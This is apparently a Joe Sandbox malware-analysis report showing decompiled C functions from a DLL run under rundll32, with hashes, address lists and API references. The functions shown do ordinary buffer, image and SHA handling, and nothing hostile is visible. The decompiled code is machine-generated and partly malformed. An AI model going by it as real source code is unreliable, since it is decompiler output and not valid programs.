Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_rescale_rnd$mv_mul_qmv_reduce
String ID:
API String ID: 3269292098-0
Opcode ID: f624b8d92a1708bc234eb41fcbaf1f65781f80c408bdb3c29c89a492a19e0c72
Instruction ID: 32a7e665d33738f0cd05e796bf5e7e595d24b251b1839c0e3c978cd3fb488921
Opcode Fuzzy Hash: f624b8d92a1708bc234eb41fcbaf1f65781f80c408bdb3c29c89a492a19e0c72
Instruction Fuzzy Hash: F171AF74A097409FC344CF29D48061AFBE1BFC8764F548A2EF8A993360D771E9418F86

Uniqueness

Uniqueness Score: -1.00%

Function 1003A320 Relevance: 6.1, APIs: 4, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1003A320(void* __edx, signed char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				signed int _v32;
				signed int _v36;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t53;
				signed int _t57;
				int _t60;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed char* _t74;
				signed int _t75;
				signed int _t76;
				signed char _t78;
				unsigned int _t79;
				signed int _t80;
				void* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;
				signed int _t91;
				void* _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed char* _t96;
				void* _t97;
				signed int* _t98;

				_t98 = _t97 - 0x3c;
				_t91 = _a12;
				_t93 = _a16;
				 *_t98 = 0;
				_t73 = _a20;
				_v72 = _t91;
				_v68 = _t93;
				_v64 = _t73;
				_v60 = _a24;
				_t51 = E1003A070(_t73, __edx, _t91, _t93);
				_t76 = _t51;
				if(_t51 < 0) {
					L13:
					return _t76;
				} else {
					 *_t98 = _t51;
					_t53 = E10026230();
					_t95 = _t53;
					if(_t53 == 0) {
						_t76 = 0xfffffff4;
						goto L13;
					} else {
						_v56 = _t73;
						_v60 = _t93;
						_v64 = _t91;
						_v68 = _t95;
						_v52 = _a24;
						_v72 = _a8;
						 *_t98 = _a4;
						_t57 = E1003A1B0();
						_t76 = _t57;
						if(_t57 < 0) {
							 *_t98 = _t95;
							_v36 = _t57;
							L100265B0();
							return _v36;
						} else {
							if(_t73 > 0xb) {
								_t91 = 1;
								_t84 = 0;
								_t94 = 0;
								goto L6;
							} else {
								_t87 = (_t73 + _t73 * 4) * 4 + "u8";
								_t88 =  *(_t87 + 0xc);
								_t63 =  *(_t87 + 8) >> 3;
								if(_t88 == 0) {
									_t64 = _t63 * _t91;
									_t91 = 1;
									_t94 = _t93 * _t64;
									_t84 = ((_t64 & 0xffffff00 | _t73 == 0x00000000 | _t88 & 0xffffff00 | _t73 == 0x00000005) & 0x000000ff) << 7;
									goto L6;
								} else {
									_t94 = _t93 * _t63;
									_t84 = ((_t63 & 0xffffff00 | _t73 == 0x00000000 | _t88 & 0xffffff00 | _t73 == 0x00000005) & 0x000000ff) << 7;
									if(_t91 > 0) {
										L6:
										_v32 = _t76;
										_t74 = _a4;
										_t96 = _t74;
										_v36 = _t74 + _t91 * 4;
										_t60 = _t84 * 0x1010101;
										_t75 = _t84;
										do {
											_t78 =  *_t96;
											_t85 = _t94;
											_t92 = _t78;
											if(_t94 >= 8) {
												if((_t78 & 0x00000001) != 0) {
													 *_t78 = _t60;
													_t45 = _t94 - 1; // -1
													_t85 = _t45;
													_t92 = _t92 + 1;
												}
												if((_t92 & 0x00000002) != 0) {
													 *_t92 = _t60;
													_t85 = _t85 - 2;
													_t92 = _t92 + 2;
												}
												if((_t92 & 0x00000004) != 0) {
													 *_t92 = _t60;
													_t85 = _t85 - 4;
													_t92 = _t92 + 4;
												}
												_t79 = _t85;
												_t85 = _t85 & 0x00000003;
												_t80 = _t79 >> 2;
												_t60 = memset(_t92, _t60, _t80 << 2);
												_t98 =  &(_t98[3]);
												_t92 = _t92 + _t80;
											}
											_t86 = _t85 & 0x00000007;
											if(_t86 != 0) {
												_t82 = 0;
												do {
													 *(_t92 + _t82) = _t75;
													_t82 = _t82 + 1;
												} while (_t82 < _t86);
											}
											_t96 =  &_a4;
										} while (_v36 != _t96);
										_t76 = _v32;
									}
								}
							}
							goto L13;
						}
					}
				}
			}

0x1003a324
0x1003a327
0x1003a32b
0x1003a32f
0x1003a336
0x1003a33e
0x1003a342
0x1003a346
0x1003a34a
0x1003a34e
0x1003a355
0x1003a357
0x1003a428
0x1003a431
0x1003a35d
0x1003a35d
0x1003a360
0x1003a367
0x1003a369
0x1003a4e5
0x00000000
0x1003a36f
0x1003a36f
0x1003a377
0x1003a37b
0x1003a37f
0x1003a383
0x1003a38b
0x1003a393
0x1003a396
0x1003a39d
0x1003a39f
0x1003a460
0x1003a463
0x1003a467
0x1003a479
0x1003a3a5
0x1003a3a8
0x1003a480
0x1003a485
0x1003a487
0x00000000
0x1003a3ae
0x1003a3b1
0x1003a3bb
0x1003a3be
0x1003a3c3
0x1003a4c0
0x1003a4c3
0x1003a4c8
0x1003a4de
0x00000000
0x1003a3c9
0x1003a3c9
0x1003a3e1
0x1003a3e3
0x1003a3e5
0x1003a3e5
0x1003a3e9
0x1003a3f0
0x1003a3f2
0x1003a3f6
0x1003a3fc
0x1003a400
0x1003a400
0x1003a406
0x1003a408
0x1003a40a
0x1003a43b
0x1003a4b0
0x1003a4b2
0x1003a4b2
0x1003a4b5
0x1003a4b5
0x1003a443
0x1003a4a0
0x1003a4a3
0x1003a4a6
0x1003a4a6
0x1003a44b
0x1003a490
0x1003a492
0x1003a495
0x1003a495
0x1003a44d
0x1003a44f
0x1003a452
0x1003a455
0x1003a455
0x1003a455
0x1003a455
0x1003a40c
0x1003a40f
0x1003a411
0x1003a413
0x1003a413
0x1003a416
0x1003a417
0x1003a413
0x1003a41b
0x1003a41e
0x1003a424
0x1003a424
0x1003a3e3
0x1003a3c3
0x00000000
0x1003a3a8
0x1003a39f
0x1003a369

APIs

mv_samples_get_buffer_size.MAIN ref: 1003A34E
mv_malloc.MAIN ref: 1003A360
mv_samples_fill_arrays.MAIN ref: 1003A396

Part of subcall function 1003A1B0: mv_samples_get_buffer_size.MAIN ref: 1003A201

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_samples_get_buffer_size$mv_mallocmv_samples_fill_arrays
String ID:
API String ID: 3894167361-0
Opcode ID: 8d336f63005a17f0ce2746193248b8f2ccff729fc354cbe18226dd819581e305
Instruction ID: 29f813314073505780b3b6a0bf21f4ec65a179872cc3375d0f3d993001abd10e
Opcode Fuzzy Hash: 8d336f63005a17f0ce2746193248b8f2ccff729fc354cbe18226dd819581e305
Instruction Fuzzy Hash: 0A419D75E083018FD705CF29C58460EFBE6EFCA355F55892EE8888B350E7B5E9858B42

Uniqueness

Uniqueness Score: -1.00%

Function 1001B0A4 Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1001B0A4(void* __ebx, void* __edi, void* __esi) {
				void* _t70;

				while(1) {
					__ebp = __ebp + __ebp;
					__eflags = __ebp - __esi;
					if(__eflags > 0) {
						break;
					}
					__eax =  *(__ebx + 0x44);
					__ebp =  ~__ebp;
					 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
					__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
					__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
					__eax =  *(__ebx + 0x50);
					 *__esp = __edi;
					__esp[1] =  *(__ebx + 0x50);
					__eax = L1001EAB0(__eflags);
					__eflags = __eax;
					__edx = __eax;
					if(__eax < 0) {
						L1:
						return _t70;
					}
					__eax =  *(__ebx + 0x20);
					__eflags = __esp[0xb] & __eax;
					if((__esp[0xb] & __eax) != 0) {
						continue;
					}
					__eflags = __eax;
					if(__eflags == 0) {
						L10:
						__esp[0xc] = __eax;
						__eax =  *(__ebx + 0x24);
						__esp[0xd] =  *(__ebx + 0x24);
						__eax =  *(__ebx + 0x28);
						__esp[0xe] =  *(__ebx + 0x28);
						__eax =  *(__ebx + 0x2c);
						__esp[0xf] =  *(__ebx + 0x2c);
						__eax =  *(__ebx + 0x48);
						__edi =  *(__ebx + 0x48) + 0x1f;
						__eax =  &(__esp[0xc]);
						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
						__esp[3] =  &(__esp[0xc]);
						__esp[2] = __edi;
						__eax =  *(__ebx + 0x50);
						__esp[1] =  *(__ebx + 0x50);
						__eax =  &(__esp[0x10]);
						 *__esp =  &(__esp[0x10]);
						__eax = L1001EE90(__ebx, __edi, __esi, __ebp, __eflags);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L1;
						}
						__eax = 0x20;
						__ecx = __esp[0x10];
						__edx = 0x7fffffff;
						__eflags = __esp[0x1d] - 0x20;
						__ebp = 0x7fffffff;
						__eax =  >=  ? __esp[0x1d] : 0x20;
						__esi = 0x20;
						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
						__ebp = 0x7fffffdf;
						__eflags = 0x7fffffdf - __ecx;
						if(0x7fffffdf < __ecx) {
							L24:
							__edx = 0xffffffea;
							goto L1;
						}
						__ecx = __ecx + __eax;
						__eax = __esp[0x11];
						0x7fffffff = 0x7fffffff - __ecx;
						__eflags = 0x7fffffff - __ecx - __eax;
						if(0x7fffffff - __ecx < __eax) {
							goto L24;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x12];
						__ebp = 0x7fffffff;
						__ebp = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __ecx;
						if(0x7fffffff < __ecx) {
							goto L24;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x13];
						__edx = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __eax - __ecx;
						if(0x7fffffff - __eax < __ecx) {
							goto L24;
						}
						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
						 *(__ebx + 0xb8) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							__edx = 0xfffffff4;
							L26:
							__esp[0xb] = __edx;
							__ebx = E1001A460(__ebx);
							__edx = __esp[0xb];
							goto L1;
						}
						__edx = __ebx + 0x20;
						__esp[4] = __ebx + 0x20;
						__eax =  *(__eax + 4);
						__esp[2] = __edi;
						__esp[3] = __eax;
						__eax =  *(__ebx + 0x50);
						 *__esp = __ebx;
						__esp[1] =  *(__ebx + 0x50);
						__eax = L1001EFD0(__ebx, __edi, __esi, __ebp);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L26;
						}
						__eax =  *(__ebx + 4);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = __eax + __esi;
							__eflags = __eax;
							 *(__ebx + 4) = __eax;
						}
						__eax =  *(__ebx + 8);
						__eflags = __eax;
						if(__eax != 0) {
							 *(__ebx + 8) = __eax;
						}
						__eax =  *(__ebx + 0xc);
						__eflags = __eax;
						if(__eax != 0) {
							__edx = __esi + __esi * 2;
							__eax = __eax + __esi + __esi * 2;
							__eflags = __eax;
							 *(__ebx + 0xc) = __eax;
						}
						 *(__ebx + 0x40) = __ebx;
						__edx = 0;
						goto L1;
					}
					break;
				}
				__ecx =  *(__ebx + 0x24);
				__eax = __esi + __eax - 1;
				__edx = __esi;
				__edx =  ~__esi;
				__eax = __eax & __edx;
				 *(__ebx + 0x20) = __eax;
				__eflags = __ecx;
				if(__eflags != 0) {
					__ecx = __esi + __ecx - 1;
					 *(__ebx + 0x24) = __ecx;
					__ecx =  *(__ebx + 0x28);
					__eflags = __ecx;
					if(__eflags != 0) {
						__ecx = __esi + __ecx - 1;
						 *(__ebx + 0x28) = __ecx;
						__ecx =  *(__ebx + 0x2c);
						__eflags = __ecx;
						if(__eflags != 0) {
							__edx = __edx & __ecx;
							__eflags = __edx;
							 *(__ebx + 0x2c) = __edx;
						}
					}
				}
				goto L10;
			}

0x1001b0a8
0x1001b0a8
0x1001b0aa
0x1001b0ac
0x00000000
0x00000000
0x1001b0ae
0x1001b0b3
0x1001b0b7
0x1001b0b8
0x1001b0ba
0x1001b0be
0x1001b0c1
0x1001b0c4
0x1001b0c8
0x1001b0cd
0x1001b0cf
0x1001b0d1
0x1001af07
0x1001af10
0x1001af10
0x1001b0d7
0x1001b0da
0x1001b0de
0x00000000
0x00000000
0x1001b0e0
0x1001b0e2
0x1001b121
0x1001b121
0x1001b125
0x1001b128
0x1001b12c
0x1001b12f
0x1001b133
0x1001b136
0x1001b13a
0x1001b13d
0x1001b140
0x1001b144
0x1001b147
0x1001b14b
0x1001b14f
0x1001b152
0x1001b156
0x1001b15a
0x1001b15d
0x1001b162
0x1001b164
0x1001b166
0x00000000
0x00000000
0x1001b16c
0x1001b171
0x1001b175
0x1001b17a
0x1001b17e
0x1001b180
0x1001b185
0x1001b187
0x1001b18e
0x1001b190
0x1001b192
0x1001b23d
0x1001b23d
0x00000000
0x1001b23d
0x1001b198
0x1001b19a
0x1001b1a0
0x1001b1a2
0x1001b1a4
0x00000000
0x00000000
0x1001b1aa
0x1001b1ac
0x1001b1b0
0x1001b1b2
0x1001b1b4
0x1001b1b6
0x00000000
0x00000000
0x1001b1bc
0x1001b1be
0x1001b1c2
0x1001b1c4
0x1001b1c6
0x00000000
0x00000000
0x1001b1cd
0x1001b1d2
0x1001b1d8
0x1001b1da
0x1001b2c7
0x1001b2cc
0x1001b2cc
0x1001b2d2
0x1001b2d7
0x00000000
0x1001b2d7
0x1001b1e0
0x1001b1e3
0x1001b1e7
0x1001b1ea
0x1001b1ee
0x1001b1f2
0x1001b1f5
0x1001b1f8
0x1001b1fc
0x1001b201
0x1001b203
0x1001b205
0x00000000
0x00000000
0x1001b20b
0x1001b20e
0x1001b210
0x1001b212
0x1001b212
0x1001b214
0x1001b214
0x1001b217
0x1001b21a
0x1001b21c
0x1001b221
0x1001b221
0x1001b224
0x1001b227
0x1001b229
0x1001b22b
0x1001b22e
0x1001b22e
0x1001b230
0x1001b230
0x1001b233
0x1001b236
0x00000000
0x1001b236
0x00000000
0x1001b0e2
0x1001b0e4
0x1001b0e7
0x1001b0eb
0x1001b0ed
0x1001b0ef
0x1001b0f1
0x1001b0f4
0x1001b0f6
0x1001b0f8
0x1001b0fe
0x1001b101
0x1001b104
0x1001b106
0x1001b108
0x1001b10e
0x1001b111
0x1001b114
0x1001b116
0x1001b11c
0x1001b11c
0x1001b11e
0x1001b11e
0x1001b116
0x1001b106
0x00000000

APIs

mv_image_fill_linesizes.MAIN ref: 1001B0C8

Part of subcall function 1001EAB0: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 1001EAC6

mv_image_fill_plane_sizes.MAIN ref: 1001B15D
mv_buffer_alloc.MAIN ref: 1001B1CD
mv_image_fill_pointers.MAIN ref: 1001B1FC

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_allocmv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_pix_fmt_desc_get
String ID:
API String ID: 2879504290-0
Opcode ID: 7341e7224c3c084a21f5b683c78ee4c84bc759b0f2a3afcbc0be0c244e6f78e6
Instruction ID: 8f506c5f79b5a5d03f9a5ada546bbcf13e993700c3781cdda1da6b75d303e5b0
Opcode Fuzzy Hash: 7341e7224c3c084a21f5b683c78ee4c84bc759b0f2a3afcbc0be0c244e6f78e6
Instruction Fuzzy Hash: 4151F9B5608B018FCB48DF69D5D066ABBE1FF88240F15897DE949CB359E731E884CB41

Uniqueness

Uniqueness Score: -1.00%

Function 100290D0 Relevance: 6.1, APIs: 4, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E100290D0(intOrPtr* __eax, intOrPtr __edx, signed int _a4, intOrPtr* _a8) {
				signed char _v540;
				signed int _v544;
				signed int _v548;
				intOrPtr* _v552;
				char _v553;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t34;
				intOrPtr* _t48;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t58;
				signed char* _t59;
				void* _t60;
				intOrPtr* _t61;

				_t61 = _t60 - 0x22c;
				_v552 = __eax;
				_v540 = 0;
				_v548 = _a4;
				_v544 = _a8;
				if(__edx == 0) {
					L18:
					return 0;
				} else {
					_t34 = _v552;
					if(_t34 == 0) {
						goto L18;
					} else {
						_t58 =  *_t34;
						_t55 = __edx;
						_t48 = 0;
						_v553 = 0;
						L3:
						while(1) {
							L3:
							while(1) {
								if(_t48 != 0) {
									L13:
									_t56 =  *((intOrPtr*)(_t48 + 0x30));
									if(_t56 != 0) {
										_t48 = _t48 + 0x30;
										goto L7;
									}
								} else {
									L4:
									if(_t58 == 0) {
										if(_t48 != 0) {
											goto L13;
										} else {
										}
									} else {
										_t48 = _a8;
										if(_t48 != 0) {
											_t56 =  *_t48;
											if(_t56 != 0) {
												L7:
												if( *((intOrPtr*)(_t48 + 0xc)) != 0xa) {
													continue;
												} else {
													_v568 = _t55;
													 *_t61 =  *((intOrPtr*)(_t48 + 0x2c));
													if(strcmp(??, ??) != 0 || (_v544 &  *(_t48 + 0x14) | _v548 &  *(_t48 + 0x10)) == 0) {
														continue;
													} else {
														_t59 =  &_v540;
														if(_v553 != 0) {
															 *_t61 = _t59;
															_v568 = 0x200;
															_v564 = 0x100b3e24;
															E100067F0(_t48, _t55, 0x200);
															_t56 =  *_t48;
														}
														 *_t61 = _t59;
														_v560 = _t56;
														_v564 = 0x100b3e26;
														_v568 = 0x200;
														E100067F0(_t48, _t55, _t56);
														_t58 =  *_v552;
														_v553 = _v540 & 0x000000ff;
														if(_t48 == 0) {
															goto L4;
														} else {
															goto L13;
														}
													}
												}
											}
										}
									}
								}
								if(_v553 != 0) {
									 *_t61 =  &_v540;
									return E100267C0(_t48, _t55, _t56, _t58);
								} else {
									goto L18;
								}
								goto L21;
							}
						}
					}
				}
				L21:
			}

0x100290d4
0x100290dc
0x100290e7
0x100290ec
0x100290f7
0x100290fb
0x100291e7
0x100291f3
0x10029101
0x10029101
0x10029107
0x00000000
0x1002910d
0x1002910d
0x1002910f
0x10029111
0x10029113
0x00000000
0x10029120
0x00000000
0x10029120
0x10029122
0x100291c0
0x100291c0
0x100291c5
0x100291c7
0x00000000
0x100291c7
0x10029128
0x10029128
0x1002912a
0x100291d2
0x00000000
0x00000000
0x00000000
0x10029130
0x10029130
0x10029135
0x1002913b
0x1002913f
0x10029145
0x10029149
0x00000000
0x1002914b
0x1002914b
0x10029152
0x1002915c
0x00000000
0x10029174
0x10029179
0x1002917d
0x10029210
0x1002921d
0x10029221
0x10029225
0x1002922a
0x1002922a
0x10029183
0x10029190
0x10029194
0x10029198
0x1002919c
0x100291a7
0x100291ae
0x100291b2
0x00000000
0x00000000
0x00000000
0x00000000
0x100291b2
0x1002915c
0x10029149
0x1002913f
0x10029135
0x1002912a
0x100291e5
0x100291fc
0x1002920e
0x00000000
0x00000000
0x00000000
0x00000000
0x100291e5
0x10029120
0x10029120
0x10029107
0x00000000

APIs

strcmp.MSVCRT ref: 10029155
mv_strlcatf.MAIN ref: 1002919C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strlcatfstrcmp
String ID:
API String ID: 3138383634-0
Opcode ID: e6d04f5b88f278462d021f45b59cfba453c363faba32e7f9e0e655f4c856f37f
Instruction ID: 4e00ca5e32ba23cd1f0d150041dade036c75141da2ff9e4549c40cdffe91d108
Opcode Fuzzy Hash: e6d04f5b88f278462d021f45b59cfba453c363faba32e7f9e0e655f4c856f37f
Instruction Fuzzy Hash: 3C316B75A083968FDB10DF6AE48475BBBE4EF84384F55486EEC9897201D334ED18CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1009D7D0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 1009D822
MultiByteToWideChar.KERNEL32 ref: 1009D865

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: e06c874c7b0f77f595b58fe30017b44e27d557a91db68f2b64ff68b0ac9c3ef2
Instruction ID: b6030a99734b0483f6aa4200c2ea406aadadd20ec724542bcc610d09dc4c1d1f
Opcode Fuzzy Hash: e06c874c7b0f77f595b58fe30017b44e27d557a91db68f2b64ff68b0ac9c3ef2
Instruction Fuzzy Hash: 8431E2B45093918FD700EF68D58424BBBF0FF85354F00895EE8988B252D7BAD849DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10032734 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

clock.MSVCRT ref: 10032773
mv_sha_init.MAIN ref: 1003280D
mv_sha_update.MAIN ref: 10032827
mv_sha_final.MAIN ref: 10032837

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: clockmv_sha_finalmv_sha_initmv_sha_update
String ID:
API String ID: 679641161-0
Opcode ID: 6f861df05181ea4ff24294a19bc8cb2a57f6845d629d0ae6cd75aa9bb61d67ba
Instruction ID: 2963d4e084b8430f89c99bd8ea125613e8711b22e7604053a18660b36ac50186
Opcode Fuzzy Hash: 6f861df05181ea4ff24294a19bc8cb2a57f6845d629d0ae6cd75aa9bb61d67ba
Instruction Fuzzy Hash: 63218D76A043108FE308EF38CAC424AB7E2EBC8316F95C93DDD889B355DA75D9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001E54B Relevance: 6.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E1001E54B(void* __eax) {

				while(1) {
					__esp[1] = __eax;
					__eax = __esp[0x18];
					__edx = 0;
					__esp[2] = 0;
					 *__esp = __esp[0x18];
					__eax = E1001E2F0();
					__edi = __eax;
					if(__eax < 0) {
						break;
					}
					__eax = __esp[0xa];
					__ebp = __ebp + 1;
					__eax =  *(__esp[0xa] + 0x20);
					if(__ebp >= __eax) {
						__esi = __esp[0xb];
						__ebx = __edi;
						__edx = __esp[0xa];
						L8:
						if(__eax <= 0) {
							__eax =  &(__esp[0xf]);
							__ebx = 0;
							E100265C0( &(__esp[0xf]));
							L2:
							return 0;
						}
						L9:
						__edi = 0;
						__ebp = __edx;
						do {
							__esp[0xf] = __esp[0xf] + __edi * 4;
							__edi = __edi + 1;
							__eax = L1001ADB0(__ebx, __eax);
						} while (__edi <  *((intOrPtr*)(__ebp + 0x20)));
						__eax =  &(__esp[0xf]);
						E100265C0( &(__esp[0xf]));
						if(__ebx >= 0) {
							goto L2;
						}
						L12:
						__eax = __esi[1];
						__eax =  *(__esi[1]);
						__eax =  *( *(__esi[1]) + 0x38);
						if(__eax != 0) {
							 *__esp = __esi;
							__eax =  *__eax();
						}
						goto L2;
					}
					__esi = __esp[0xf];
					__eax = L1001AC40(__ebx, __edi, __esi);
					__ebx = __ebp * 4;
					 *__esi = __eax;
					__eax = __esp[0xf];
					__eax =  *(__esp[0xf] + __ebx);
					if(__eax != 0) {
						continue;
					}
					__edx = __esp[0xa];
					__ebx = __edi;
					__esi = __esp[0xb];
					__eax =  *(__edx + 0x20);
					goto L8;
				}
				__edx = __esp[0xa];
				__ebx = __eax;
				__esi = __esp[0xb];
				__eax =  *(__edx + 0x20);
				if( *(__edx + 0x20) > 0) {
					goto L9;
				}
				__eax =  &(__esp[0xf]);
				E100265C0( &(__esp[0xf]));
				goto L12;
			}

0x1001e550
0x1001e550
0x1001e554
0x1001e558
0x1001e55a
0x1001e55e
0x1001e561
0x1001e568
0x1001e56a
0x00000000
0x00000000
0x1001e570
0x1001e574
0x1001e575
0x1001e57a
0x1001e622
0x1001e626
0x1001e628
0x1001e5ac
0x1001e5ae
0x1001e631
0x1001e635
0x1001e63a
0x1001e46a
0x1001e473
0x1001e473
0x1001e5b4
0x1001e5b4
0x1001e5b6
0x1001e5c0
0x1001e5c4
0x1001e5c7
0x1001e5cb
0x1001e5d0
0x1001e5d5
0x1001e5dc
0x1001e5e3
0x00000000
0x1001e468
0x1001e5e9
0x1001e5e9
0x1001e5ec
0x1001e5ee
0x1001e5f3
